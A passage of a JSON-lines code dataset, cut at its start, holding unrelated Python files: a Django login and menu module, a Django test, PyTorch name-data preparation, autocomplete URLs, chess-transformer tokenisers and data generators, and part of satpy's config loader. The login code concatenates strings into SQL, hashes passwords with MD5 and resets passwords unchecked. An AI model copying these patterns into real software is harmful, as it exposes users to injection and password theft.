permissions\n                purlist = findNavByRcode(user.role_id)\n                request.session[\"s_umenu\"] = getMenu(purlist)\n                response_data['status'] = \"0\"\n            else:\n                response_data['status'] = \"2\"\n        else:\n            response_data['status'] = \"3\"\n    except Exception as e:\n        print(e)\n        response_data['status'] = \"1\"\n\n    return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\ndef getMenu(purlist):\n    m1list = sorted(purlist, key=lambda pur: pur[\"nav_id\"])\n    menu_dict = {}\n    if m1list:\n        for p in m1list:\n            if p[\"parent_id\"]=='-1':\n                p.setdefault(\"sub\",[])\n                menu_dict.setdefault(\"nav_\"+str(p[\"nav_id\"]),p)\n            else:\n                pid = str(p[\"parent_id\"])\n                if \"nav_\"+pid in menu_dict and \"sub\" in menu_dict[\"nav_\"+pid]:\n                    menu_dict[\"nav_\"+pid][\"sub\"].append(p)\n    menu_list = [item for item in menu_dict.values()]\n\n    menu_list = sorted(menu_list, key=lambda menu: menu[\"sort_id\"])\n    for item in menu_list:\n        temp = sorted(item['sub'],key=lambda obj: obj[\"sort_id\"])\n        item['sub'] = temp\n    return menu_list\n\n\n# Query menu items by role code\ndef findNavByRcode(rcodes):\n    sql = \"select DISTINCT r.role_id,r.nav_id, \"\n    sql += \"n.nav_name,n.parent_id,n.url, \"\n    sql += \"n.sort_id,n.icon \"\n    sql += \"from role_nav r,nav_list n \"\n    sql += \"where r.nav_id=n.nav_id \"\n    sql += \"and n.flag=0 \"\n    if rcodes:\n        sql += \"and r.role_id in (\" + rcodes + \") \"\n\n    sql += \"order by n.sort_id \"\n\n    cursor = connection.cursor()\n    cursor.execute(sql)\n    plist = cursor.fetchall()\n    rslist = []\n    if plist:\n        for p in plist:\n            item = []\n            item.append((\"role_id\",p[0]))\n            item.append((\"nav_id\",p[1]))\n            item.append((\"nav_name\",p[2]))\n            item.append((\"parent_id\",p[3]))\n            item.append((\"url\",p[4]))\n            item.append((\"sort_id\",p[5]))\n            item.append((\"icon\",p[6]))\n            rslist.append(dict(item))\n    return rslist\n\n\n# Captcha image\ndef vcode(request):\n    image = mtu.verifycode(request,'s_vcode')\n    # Save the image data into a BytesIO stream\n    buff = BytesIO()\n    image.save(buff,\"png\")\n    return HttpResponse(buff.getvalue(),'image/png')\n\n# Log out\ndef logout(request):\n    try:\n        del request.session[\"s_uname\"]\n        del request.session[\"s_roleid\"]\n        del request.session[\"s_vcode\"]\n        del request.session[\"s_umenu\"]\n        del request.session[\"homeurl\"]\n    except:\n        print(\"session[s_uname] does not exist\")\n\n    return render(request,\"login.html\")\n\ndef updatePwd(request):\n    data = {}\n    if request.method == 'POST':\n\n        userId = request.session[\"s_uid\"]\n        try:\n            newPwd = mtu.getReqVal(request,\"newPwd\",\"\")\n            pwd = mtu.md5(newPwd)\n            AdminUser.objects.filter(id=userId).update(password=pwd)\n            data[\"result\"] = \"0\"\n        except Exception as e:\n            print(e)\n\n    return render(request,'restPassword.html',locals())\n\n","sub_path":"sellcard/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
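`getMenu` folds the flat rows from `findNavByRcode` into a two-level menu: rows with `parent_id == '-1'` become top-level entries and everything else is appended to its parent's `sub` list. A small demonstration with fabricated rows; ids, names, urls, and icons are sample data only:

```python
rows = [
    {"role_id": 1, "nav_id": 10, "nav_name": "Cards", "parent_id": "-1",
     "url": "#", "sort_id": 1, "icon": "fa-credit-card"},
    {"role_id": 1, "nav_id": 11, "nav_name": "Sell card", "parent_id": "10",
     "url": "/sell", "sort_id": 1, "icon": "fa-shopping-cart"},
]
menu = getMenu(rows)
print(menu[0]["nav_name"], "->", menu[0]["sub"][0]["nav_name"])
# Cards -> Sell card
```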
+{"seq_id":"171772369","text":"from django.core.urlresolvers import reverse\nfrom django.contrib.messages.storage.fallback import FallbackStorage\nfrom django.contrib.messages import get_messages\nfrom django.conf import settings\n\nfrom ...models import GroupAccount\nfrom ...forms import BulkUserUploadForm\nfrom ...views import upload_user_list\n\nfrom . import GroupAdminViewsTests \n\nimport os\n\nclass UploadUserListTests(GroupAdminViewsTests):\n\n def test_upload_user_list_post(self):\n group = GroupAccount.objects.create(name='CUG', max_no_of_users=10)\n self.subscriber.group = group\n self.subscriber.save()\n\n with open(os.path.join(settings.BASE_DIR, 'accounts/tests/test_files/test.csv'), 'r') as _file:\n request = self.factory.post(reverse('accounts:upload_user_list'), {'user_list': _file})\n\n request.user = self.user\n\n self.session.process_request(request)\n request.session.save()\n\n messages = FallbackStorage(request)\n setattr(request, '_messages', messages)\n\n response = upload_user_list(request)\n storage = get_messages(request)\n\n lst = []\n for message in storage:\n lst.append(message)\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual('Users added successfully.', lst[0].__str__())\n self.assertEqual(response.get('location'), reverse('accounts:upload_user_list'))\n\n def test_upload_user_list_get(self):\n self.c.post(reverse('accounts:login'), {'username': '0542751610', 'password': '12345'})\n response = self.c.get(reverse('accounts:upload_user_list'))\n\n self.assertEqual(response.status_code, 200)\n self.assertTrue('form' in response.context)\n self.assertTrue('file_length' in response.context)\n self.assertEqual(response.context['file_length'], settings.MAX_FILE_LENGTH)\n self.assertTrue(isinstance(response.context['form'], BulkUserUploadForm))\n self.assertTemplateUsed(response, 'accounts/upload_user_list.html')\n","sub_path":"accounts/tests/views/test_upload_user_list.py","file_name":"test_upload_user_list.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"591656001","text":"import glob\nimport os\nimport unicodedata\nimport string\n\nall_letters = string.ascii_letters + \" .,;'-\"\nn_letters = len(all_letters) + 1 # Plus EOS marker\n\n\ndef find_files(path):\n return glob.glob(path)\n\n\n# Turn a Unicode string to plain ASCII, thanks to https://stackoverflow.com/a/518232/2809427\ndef unicode_to_ascii(s):\n return \"\".join(\n c\n for c in unicodedata.normalize(\"NFD\", s)\n if unicodedata.category(c) != \"Mn\" and c in all_letters\n )\n\n\n# Read a file and split into lines\ndef read_lines(filename):\n lines = open(filename, encoding=\"utf-8\").read().strip().split(\"\\n\")\n return [unicode_to_ascii(line) for line in lines]\n\n\n# Build the category_lines dictionary, a list of lines per category\ncategory_lines = {}\nall_categories = []\nfor filename in find_files(\"data/names/*.txt\"):\n category = os.path.splitext(os.path.basename(filename))[0]\n all_categories.append(category)\n lines = read_lines(filename)\n category_lines[category] = lines\n\nn_categories = len(all_categories)\n\nif n_categories == 0:\n raise RuntimeError(\n \"Data not found. Make sure that you downloaded data \"\n \"from https://download.pytorch.org/tutorial/data.zip and extract it to \"\n \"the current directory.\"\n )\n\nprint(\"# categories:\", n_categories, all_categories)\nprint(unicode_to_ascii(\"O'Néàl\"))\n","sub_path":"pytorch/generate-names/src/prepare-data.py","file_name":"prepare-data.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187341562","text":"from dal import autocomplete\n\nfrom django.conf.urls import url\n\nfrom .models import TestModel\n\n\nclass LinkedDataView(autocomplete.Select2QuerySetView):\n def get_queryset(self):\n qs = super(LinkedDataView, self).get_queryset()\n owner = self.forwarded.get('owner', None)\n\n if owner:\n qs = qs.filter(owner_id=owner)\n\n return qs\n\n\nurlpatterns = [\n url(\n '^linked_data/$',\n LinkedDataView.as_view(model=TestModel),\n name='linked_data'\n ),\n]\n","sub_path":"annexes/django-autocomplete-light/test_project/linked_data/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"239422206","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\nimport chess\n\nimport chess.pgn\n\nimport numpy as np\n\nimport random\n\n\n\n\n\n# all possible pairs of starting square and target square\n\ncolumn_numbers = {\n 'a':1,\n 'b':2,\n 'c':3,\n 'd':4,\n 'e':5,\n 'f':6,\n 'g':7,\n 'h':8\n}\n\ncolumns = 'abcdefgh'\nrows = '12345678'\nsquares = []\nfor c in columns:\n for r in rows:\n squares.append(''.join([c,r]))\n \nsquare_pairs = []\nfor sq1 in squares:\n for sq2 in squares:\n square_pairs.append(''.join([sq1,sq2]))\n\nindex2moves = [] # ['0-0','0-0-0'] Rochade ist e1g1 etc.\nfor pair in square_pairs:\n if pair[0:2]!=pair[2:]: \n if pair[0] == pair[2]: # gerade hoch\n index2moves.append(pair)\n if pair[1] == pair[3]: # gerade seitwärts\n index2moves.append(pair)\n if abs(int(pair[1])-int(pair[3])) == abs(column_numbers[pair[0]]-column_numbers[pair[2]]): #diagonal\n index2moves.append(pair)\n if abs(int(pair[1])-int(pair[3])) == 1 and abs(column_numbers[pair[0]]-column_numbers[pair[2]])==2: # Springer\n index2moves.append(pair)\n if abs(int(pair[1])-int(pair[3])) == 2 and abs(column_numbers[pair[0]]-column_numbers[pair[2]])==1: # Springer\n index2moves.append(pair)\n \n if (pair[3]=='8' and pair[1]=='7') or (pair[3]=='1' and pair[1]=='2'): # Umwandlungen\n if abs(column_numbers[pair[0]]-column_numbers[pair[2]])<=1:\n index2moves.append(pair+'q')\n index2moves.append(pair+'n')\n index2moves.append(pair+'b')\n index2moves.append(pair+'r')\n\nindex2moves = list(set(index2moves))\nindex2moves = sorted(index2moves)\n\nmove2label = {}\nfor i,move in enumerate(index2moves + ['0000']): # + Nullmove\n move2label[move] = i\n\n# Hier die pure-transformer 64*64 output version: In der Reihenfolge der Token, d.h. auch der FEN.\n# output[startsquareindex][zielsquareindex] \npure_square = {}\nfor row in range(8,0,-1):\n for column in 'abcdefgh':\n pure_square[column+str(row)] = len(pure_square)\n\n\n# Tokenization of a chess position\n\ntoken2piece = '0KkQqBbNnRrPp'\n\nfen2token_dict = {\n 'K':np.array([1]),\n 'k':np.array([2]),\n 'Q':np.array([3]),\n 'q':np.array([4]),\n 'B':np.array([5]),\n 'b':np.array([6]),\n 'N':np.array([7]),\n 'n':np.array([8]),\n 'R':np.array([9]),\n 'r':np.array([10]),\n 'P':np.array([11]),\n 'p':np.array([12]),\n '1':np.array([0]),\n '2':np.array([0,0]),\n '3':np.array([0,0,0]),\n '4':np.array([0,0,0,0]),\n '5':np.array([0,0,0,0,0]),\n '6':np.array([0,0,0,0,0,0]),\n '7':np.array([0,0,0,0,0,0,0]),\n '8':np.array([0,0,0,0,0,0,0,0]),\n '/':np.array([]),\n}\n\ncastling2token = {\n 'KQkq':np.array([13,14,15,16]),\n 'Qkq':np.array([0,14,15,16]),\n 'Kkq':np.array([13,0,15,16]),\n 'KQq':np.array([13,14,0,16]),\n 'KQk':np.array([13,14,15,0]),\n 'KQ':np.array([13,14,0,0]),\n 'Kk':np.array([14,0,15,0]),\n 'Kq':np.array([13,0,0,16]),\n 'Qk':np.array([0,14,15,0]),\n 'Qq':np.array([0,14,0,16]),\n 'kq':np.array([0,0,15,16]),\n 'K':np.array([13,0,0,0]),\n 'Q':np.array([0,14,0,0]),\n 'k':np.array([0,0,15,0]),\n 'q':np.array([0,0,0,16]),\n '-':np.array([0,0,0,0]),\n}\n\ncolumn2token = {\n 'a':np.array([17]),\n 'b':np.array([18]),\n 'c':np.array([19]),\n 'd':np.array([20]),\n 'e':np.array([21]),\n 'f':np.array([22]),\n 'g':np.array([23]),\n 'h':np.array([24]),\n '-':np.array([0])\n}\n\ncolor2token = {\n 'w':np.array([25]),\n 'b':np.array([26])\n}\n\ndef elo2token(elo):\n if elo == -1: # no elo\n token = 27\n elif elo < 1500:\n token = 28\n elif elo>=2700:\n token = 39\n else:\n token = 28 + (elo-1500)//100\n return np.array([token])\n\n\n \ndef fen2token(fen, white_elo = 
-1, black_elo = -1, move_list = [], elo = True):\n token_listen = []\n liste1 = fen.split()\n\n for l in liste1[0]:\n #print(l,fen2token_dict[l])\n token_listen.append(fen2token_dict[l])\n \n token_listen.append(color2token[liste1[1]]) # Wer am Zug ist\n \n token_listen.append(castling2token[liste1[2]]) # Rochaderechte\n \n token_listen.append(column2token[liste1[3][0]]) # en passant column\n\n if elo:\n token_listen.append(elo2token(white_elo))\n token_listen.append(elo2token(black_elo))\n \n if move_list:\n for move in move_list:\n token_listen.append(np.array([move2label[move]+40]))\n\n # Außerdem gibt es noch Halbzüge seit Bauernzug/Schlagzug und Zug der Partie. Die lassen wir weg.\n \n tokens = np.concatenate(token_listen)\n tokens = tokens.reshape((1,-1))\n return tokens\n\nfen2vector_dict = {\n 'K':np.array([1,0,0,0,0,0,0,0,0,0,0,0]),\n 'k':np.array([0,1,0,0,0,0,0,0,0,0,0,0]),\n 'Q':np.array([0,0,1,0,0,0,0,0,0,0,0,0]),\n 'q':np.array([0,0,0,1,0,0,0,0,0,0,0,0]),\n 'B':np.array([0,0,0,0,1,0,0,0,0,0,0,0]),\n 'b':np.array([0,0,0,0,0,1,0,0,0,0,0,0]),\n 'N':np.array([0,0,0,0,0,0,1,0,0,0,0,0]),\n 'n':np.array([0,0,0,0,0,0,0,1,0,0,0,0]),\n 'R':np.array([0,0,0,0,0,0,0,0,1,0,0,0]),\n 'r':np.array([0,0,0,0,0,0,0,0,0,1,0,0]),\n 'P':np.array([0,0,0,0,0,0,0,0,0,0,1,0]),\n 'p':np.array([0,0,0,0,0,0,0,0,0,0,0,1]),\n '1':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*1),\n '2':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*2),\n '3':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*3),\n '4':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*4),\n '5':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*5),\n '6':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*6),\n '7':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*7),\n '8':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*8),\n '/':np.array([]),\n}\n\ncastling2vector = {\n 'KQkq':np.array([1,1,1,1]),\n 'Qkq':np.array([0,1,1,1]),\n 'Kkq':np.array([1,0,1,1]),\n 'KQq':np.array([1,1,0,1]),\n 'KQk':np.array([1,1,1,0]),\n 'KQ':np.array([1,1,0,0]),\n 'Kk':np.array([1,0,1,0]),\n 'Kq':np.array([1,0,0,1]),\n 'Qk':np.array([0,1,1,0]),\n 'Qq':np.array([0,1,0,1]),\n 'kq':np.array([0,0,1,1]),\n 'K':np.array([1,0,0,0]),\n 'Q':np.array([0,1,0,0]),\n 'k':np.array([0,0,1,0]),\n 'q':np.array([0,0,0,1]),\n '-':np.array([0,0,0,0]),\n}\n\ncolumn2vector = {\n 'a':np.array([1,0,0,0,0,0,0,0]),\n 'b':np.array([0,1,0,0,0,0,0,0]),\n 'c':np.array([0,0,1,0,0,0,0,0]),\n 'd':np.array([0,0,0,1,0,0,0,0]),\n 'e':np.array([0,0,0,0,1,0,0,0]),\n 'f':np.array([0,0,0,0,0,1,0,0]),\n 'g':np.array([0,0,0,0,0,0,1,0]),\n 'h':np.array([0,0,0,0,0,0,0,1]),\n '-':np.array([0,0,0,0,0,0,0,0])\n}\n\ncolor2vector = {\n 'w':np.array([1,0]),\n 'b':np.array([0,1])\n}\n\ndef fen2vector(fen):\n vector_listen = []\n liste1 = fen.split()\n\n for l in liste1[0]:\n #print(l,fen2token_dict[l])\n vector_listen.append(fen2vector_dict[l])\n \n vector_listen.append(color2vector[liste1[1]]) # Wer am Zug ist\n \n vector_listen.append(castling2vector[liste1[2]]) # Rochaderechte\n \n vector_listen.append(column2vector[liste1[3][0]]) # en passant column\n \n # Außerdem gibt es noch Halbzüge seit Bauernzug/Schlagzug und Zug der Partie. Die lassen wir weg.\n \n vector = np.concatenate(vector_listen)\n vector = vector.reshape((1,-1)) # batch of one\n return vector\n\n\n\n\n\n\n# OLD VERSION:\n# validation_steps wird als Parameter an fit übergeben == total_validation_samples / batchsize \ndef validationdata(path, batchsize, bis_game_number, stepnumber=60000, target = 'legalmove', aws = False):\n \"\"\"\n targets können 'legalmove' sein, d.h. startfeld-zielfeld paare die tatsächlich auftreten können.\n 'outcome', d.h. 
sieg, niederlage, remis\n 'squarepairs', d.h. alle combinationen von start und zielfeld TODO\n 'startingsquare', d.h. nur das startfeld TODO\n \"\"\" \n #if aws: \n # from smart_open import open\n\n outcome_dict = {\n '1-0':np.array(0),\n '0-1':np.array(1),\n '1/2-1/2':np.array(2),\n }\n\n with open(path,encoding='latin-1') as database:\n print(chess.__version__,(chess.__version__ == '0.23.11'))\n current_game = ''\n batch = []\n labels = []\n count = 0\n step_count = 0\n while current_game != None:\n if count >= bis_game_number: # eternal loop\n database.seek(0)\n count = 0\n step_count = 0\n \n if step_count >= stepnumber: # eternal loop\n database.seek(0)\n count=0\n step_count = 0\n\n current_game = chess.pgn.read_game(database)\n board = current_game.board()\n count+=1\n\n if chess.__version__ == '0.23.11':\n current_game_moves = [move for move in current_game.main_line()]\n else:\n current_game_moves = [move for move in current_game.mainline_moves()]\n\n use_game = True\n if target == 'outcome':\n headers = current_game.headers\n if 'Result' in headers:\n if headers['Result'] in ['1/2-1/2','0-1','1-0']:\n outcome = outcome_dict[headers['Result']]\n else:\n use_game = False\n else:\n use_game = False\n\n if current_game_moves and '0000' not in current_game_moves and use_game:\n for move in current_game_moves:\n #print(move)\n fen = board.fen()\n tokens = fen2token(fen)\n batch.append(tokens)\n if target == 'legalmove':\n labels.append(move2label[move.uci()])\n elif target == 'outcome':\n labels.append(outcome)\n elif target == 'squarepairs':\n movestring = move.uci()\n startfeld_index = pure_square[movestring[:2]]\n zielfeld_index = pure_square[movestring[2:4]]\n label = np.zeros(64*64)\n label = label.reshape((64,64))\n label[startfeld_index,zielfeld_index] = 1.0\n label = label.reshape((64*64)) \n labels.append(label)\n\n board.push(move)\n step_count += 1\n \n if len(batch)==batchsize:\n batch_tensor = np.concatenate(batch)\n yield batch_tensor, np.array(labels)\n batch = []\n labels = []\n\n\n\n# OLD VERSION:\ndef trainingsdata(path, fraction, batchsize, from_game_number = 0, bis_game_number = 100000000, target = 'legalmove', aws = False):\n \"\"\"\n targets können 'legalmove' sein, d.h. startfeld-zielfeld paare die tatsächlich auftreten können.\n 'outcome', d.h. sieg, niederlage, remis\n 'squarepairs', d.h. alle combinationen von start und zielfeld TODO\n 'startingsquare', d.h. 
nur das startfeld TODO\n \"\"\"\n\n outcome_dict = {\n '1-0':np.array(0),\n '0-1':np.array(1),\n '1/2-1/2':np.array(2),\n }\n\n #if aws: \n # from smart_open import open\n\n with open(path,encoding='latin-1') as database:\n current_game = ''\n batch = []\n labels = []\n count = 0\n while True: \n # erstmal das erste game suchen, ohne parsen:\n #header = chess.pgn.read_headers(database)\n\n ## Skimming geht nicht auf der Colab python chess-version\n #while count < from_game_number:\n # count+=1\n # header = chess.pgn.read_headers(database)\n \n while current_game != None:\n #if count%1000 == 0:\n # print(count)\n \n current_game = chess.pgn.read_game(database)\n board = current_game.board()\n count+=1\n \n if from_game_number < count < bis_game_number:\n if chess.__version__ == '0.23.11':\n current_game_moves = [move for move in current_game.main_line()]\n else:\n current_game_moves = [move for move in current_game.mainline_moves()]\n current_game_movestrings = [move.uci() for move in current_game_moves]\n\n use_game = True\n if target == 'outcome':\n headers = current_game.headers\n if 'Result' in headers:\n if headers['Result'] in ['1/2-1/2','0-1','1-0']:\n outcome = outcome_dict[headers['Result']]\n else:\n use_game = False\n else:\n use_game = False\n\n\n if current_game_moves and '0000' not in current_game_movestrings and use_game:\n for move in current_game_moves:\n #print(move)\n rant = random.random()\n if rant < fraction:\n #print(\"Game no:\",count,rant)\n #print(board.fen())\n fen = board.fen()\n tokens = fen2token(fen)\n batch.append(tokens)\n if target == 'legalmove':\n labels.append(move2label[move.uci()])\n elif target == 'outcome':\n labels.append(outcome)\n elif target == 'squarepairs':\n movestring = move.uci()\n startfeld_index = pure_square[movestring[:2]]\n zielfeld_index = pure_square[movestring[2:4]]\n label = np.zeros(64*64)\n label = label.reshape((64,64))\n label[startfeld_index,zielfeld_index] = 1.0\n label = label.reshape((64*64)) \n labels.append(label)\n\n if len(batch)==batchsize:\n batch_tensor = np.concatenate(batch)\n yield batch_tensor, np.array(labels)\n batch = []\n labels = []\n board.push(move)\n \n #header = chess.pgn.read_headers(database)\n \n if count >= bis_game_number:\n current_game = None\n \n database.seek(0) # wieder von vorne\n count = 0\n\n\n\n\n\n\n\n\n\n\n\noutcome_dict = {\n '1-0':np.array(0),\n '0-1':np.array(1),\n '1/2-1/2':np.array(2),\n}\n\n# Encapsulation für bessere Lesbarkeit\ndef game_can_be_used(target,headers):\n if target == 'outcome':\n if 'Result' in headers:\n if headers['Result'] in ['1/2-1/2','0-1','1-0']:\n return True\n else:\n return False\n else:\n return False\n return True\n \n\ndef move_strings(current_game):\n if chess.__version__ == '0.23.11':\n current_game_moves = [move for move in current_game.main_line()]\n else:\n current_game_moves = [move for move in current_game.mainline_moves()]\n current_game_movestrings = [move.uci() for move in current_game_moves]\n return current_game_movestrings,current_game_moves\n\n\ndef get_elos(headers):\n white_elo = -1\n black_elo = -1\n \n if 'BlackElo' in headers:\n try:\n black_elo = int(headers['BlackElo'])\n except:\n pass\n\n if 'WhiteElo' in headers:\n try:\n white_elo = int(headers['WhiteElo'])\n except:\n pass\n \n return white_elo, black_elo\n\n\n# Current data generator\ndef data_generator(path, fraction, batchsize, pool_size = 1, from_game_number = 0, bis_game_number = 100000000, target = 'legalmove', elo = False, move_tokens = 0, validation = False):\n \"\"\"\n 
targets können 'legalmove' sein, d.h. startfeld-zielfeld paare die tatsächlich auftreten können.\n 'outcome', d.h. sieg, niederlage, remis\n 'squarepairs', d.h. alle combinationen von start und zielfeld\n 'startingsquare', d.h. nur das startfeld TODO\n \"\"\"\n #if aws: \n # from smart_open import open\n \n sample_label_pool = []\n\n with open(path,encoding='latin-1') as database:\n current_game = ''\n count = 0\n while True: \n while current_game != None:\n current_game = chess.pgn.read_game(database)\n if current_game == None:\n break\n\n board = current_game.board()\n count+=1\n\n use_game = game_can_be_used(target,current_game.headers)\n if target == 'outcome' and use_game:\n outcome = outcome_dict[current_game.headers['Result']]\n \n if not (from_game_number < count < bis_game_number):\n use_game = False\n \n current_game_moves = []\n current_game_movestrings = []\n if use_game:\n current_game_movestrings,current_game_moves = move_strings(current_game)\n \n if not (current_game_moves and '0000' not in current_game_movestrings and use_game):\n use_game = False\n \n if use_game:\n move_list = []\n for t in range(move_tokens):\n move_list.append('0000')\n \n for move in current_game_moves:\n rant = random.random()\n move_list.append(move.uci())\n if rant < fraction:\n\n white_elo, black_elo = -1,-1\n if elo:\n white_elo, black_elo = get_elos(current_game.headers)\n \n fen = board.fen()\n tokens = fen2token(fen, white_elo=white_elo, black_elo=black_elo, move_list=move_list[-1*(move_tokens+1):-1], elo=elo )\n \n \n if target == 'legalmove':\n label = move2label[move.uci()]\n elif target == 'outcome':\n label = outcome\n elif target == 'squarepairs':\n movestring = move.uci()\n startfeld_index = pure_square[movestring[:2]]\n zielfeld_index = pure_square[movestring[2:4]]\n label = np.zeros(64*64)\n label = label.reshape((64,64))\n label[startfeld_index,zielfeld_index] = 1.0\n label = label.reshape((64*64)) \n \n sample_label_pool.append((tokens,label))\n \n if len(sample_label_pool)==batchsize * pool_size:\n random.shuffle(sample_label_pool)\n batch = [t for (t,l) in sample_label_pool[:batchsize]]\n labels = [l for (t,l) in sample_label_pool[:batchsize]]\n batch_tensor = np.concatenate(batch)\n yield batch_tensor, np.array(labels)\n sample_label_pool = sample_label_pool[batchsize:] # besser in place\n \n board.push(move)\n\n if count >= bis_game_number:\n current_game = None\n if validation:\n return\n \n database.seek(0) # wieder von vorne\n current_game = ''\n count = 0 \n","sub_path":"chess_transformer_utils.py","file_name":"chess_transformer_utils.py","file_ext":"py","file_size_in_byte":20304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"135223462","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2020 Satpy developers\n#\n# This file is part of satpy.\n#\n# satpy is free software: you can redistribute it and/or modify it under the\n# terms of the GNU General Public License as published by the Free Software\n# Foundation, either version 3 of the License, or (at your option) any later\n# version.\n#\n# satpy is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with\n# satpy. If not, see .\n\"\"\"Classes for loading compositor and modifier configuration files.\"\"\"\nimport os\nimport logging\nimport warnings\n\nimport yaml\ntry:\n from yaml import UnsafeLoader\nexcept ImportError:\n from yaml import Loader as UnsafeLoader\n\nfrom satpy import DatasetDict, DataQuery, DataID\nfrom satpy._config import (get_entry_points_config_dirs, config_search_paths,\n glob_config)\nfrom satpy.utils import recursive_dict_update\nfrom satpy.dataset.dataid import minimal_default_keys_config\n\nlogger = logging.getLogger(__name__)\n\n\ndef _convert_dep_info_to_data_query(dep_info):\n key_item = dep_info.copy()\n key_item.pop('prerequisites', None)\n key_item.pop('optional_prerequisites', None)\n if 'modifiers' in key_item:\n key_item['modifiers'] = tuple(key_item['modifiers'])\n key = DataQuery.from_dict(key_item)\n return key\n\n\nclass _CompositeConfigHelper:\n \"\"\"Helper class for parsing composite configurations.\n The provided `loaded_compositors` dictionary is updated inplace.\n \"\"\"\n\n def __init__(self, loaded_compositors, sensor_id_keys):\n self.loaded_compositors = loaded_compositors\n self.sensor_id_keys = sensor_id_keys\n\n def _create_comp_from_info(self, composite_info, loader):\n key = DataID(self.sensor_id_keys, **composite_info)\n comp = loader(_satpy_id=key, **composite_info)\n return key, comp\n\n def _handle_inline_comp_dep(self, dep_info, dep_num, parent_name):\n # Create an unique temporary name for the composite\n sub_comp_name = '_' + parent_name + '_dep_{}'.format(dep_num)\n dep_info['name'] = sub_comp_name\n self._load_config_composite(dep_info)\n\n @staticmethod\n def _get_compositor_loader_from_config(composite_name, composite_info):\n try:\n loader = composite_info.pop('compositor')\n except KeyError:\n raise ValueError(\"'compositor' key missing or empty for '{}'. 
Option keys = {}\".format(\n composite_name, str(composite_info.keys())))\n return loader\n\n def _process_composite_deps(self, composite_info):\n dep_num = -1\n for prereq_type in ['prerequisites', 'optional_prerequisites']:\n prereqs = []\n for dep_info in composite_info.get(prereq_type, []):\n dep_num += 1\n if not isinstance(dep_info, dict):\n prereqs.append(dep_info)\n continue\n elif 'compositor' in dep_info:\n self._handle_inline_comp_dep(\n dep_info, dep_num, composite_info['name'])\n prereq_key = _convert_dep_info_to_data_query(dep_info)\n prereqs.append(prereq_key)\n composite_info[prereq_type] = prereqs\n\n def _load_config_composite(self, composite_info):\n composite_name = composite_info['name']\n loader = self._get_compositor_loader_from_config(composite_name, composite_info)\n self._process_composite_deps(composite_info)\n key, comp = self._create_comp_from_info(composite_info, loader)\n self.loaded_compositors[key] = comp\n\n def _load_config_composites(self, configured_composites):\n for composite_name, composite_info in configured_composites.items():\n composite_info['name'] = composite_name\n self._load_config_composite(composite_info)\n\n def parse_config(self, configured_composites, composite_configs):\n \"\"\"Parse composite configuration dictionary.\"\"\"\n try:\n self._load_config_composites(configured_composites)\n except (ValueError, KeyError):\n raise RuntimeError(\"Failed to load composites from configs \"\n \"'{}'\".format(composite_configs))\n\n\nclass _ModifierConfigHelper:\n \"\"\"Helper class for parsing modifier configurations.\n The provided `loaded_modifiers` dictionary is updated inplace.\n \"\"\"\n\n def __init__(self, loaded_modifiers, sensor_id_keys):\n self.loaded_modifiers = loaded_modifiers\n self.sensor_id_keys = sensor_id_keys\n\n @staticmethod\n def _get_modifier_loader_from_config(modifier_name, modifier_info):\n try:\n loader = modifier_info.pop('modifier', None)\n if loader is None:\n loader = modifier_info.pop('compositor')\n warnings.warn(\"Modifier '{}' uses deprecated 'compositor' \"\n \"key to point to Python class, replace \"\n \"with 'modifier'.\".format(modifier_name))\n except KeyError:\n raise ValueError(\"'modifier' key missing or empty for '{}'. 
Option keys = {}\".format(\n modifier_name, str(modifier_info.keys())))\n return loader\n\n def _process_modifier_deps(self, modifier_info):\n for prereq_type in ['prerequisites', 'optional_prerequisites']:\n prereqs = []\n for dep_info in modifier_info.get(prereq_type, []):\n if not isinstance(dep_info, dict):\n prereqs.append(dep_info)\n continue\n prereq_key = _convert_dep_info_to_data_query(dep_info)\n prereqs.append(prereq_key)\n modifier_info[prereq_type] = prereqs\n\n def _load_config_modifier(self, modifier_info):\n modifier_name = modifier_info['name']\n loader = self._get_modifier_loader_from_config(modifier_name, modifier_info)\n self._process_modifier_deps(modifier_info)\n self.loaded_modifiers[modifier_name] = (loader, modifier_info)\n\n def _load_config_modifiers(self, configured_modifiers):\n for modifier_name, modifier_info in configured_modifiers.items():\n modifier_info['name'] = modifier_name\n self._load_config_modifier(modifier_info)\n\n def parse_config(self, configured_modifiers, composite_configs):\n \"\"\"Parse modifier configuration dictionary.\"\"\"\n try:\n self._load_config_modifiers(configured_modifiers)\n except (ValueError, KeyError):\n raise RuntimeError(\"Failed to load modifiers from configs \"\n \"'{}'\".format(composite_configs))\n\n\nclass CompositorLoader:\n \"\"\"Read compositors and modifiers using the configuration files on disk.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the compositor loader.\"\"\"\n self.modifiers = {}\n self.compositors = {}\n # sensor -> { dict of DataID key information }\n self._sensor_dataid_keys = {}\n\n @classmethod\n def all_composite_sensors(cls):\n \"\"\"Get all sensor names from available composite configs.\"\"\"\n paths = get_entry_points_config_dirs('satpy.composites')\n composite_configs = glob_config(\n os.path.join(\"composites\", \"*.yaml\"),\n search_dirs=paths)\n yaml_names = 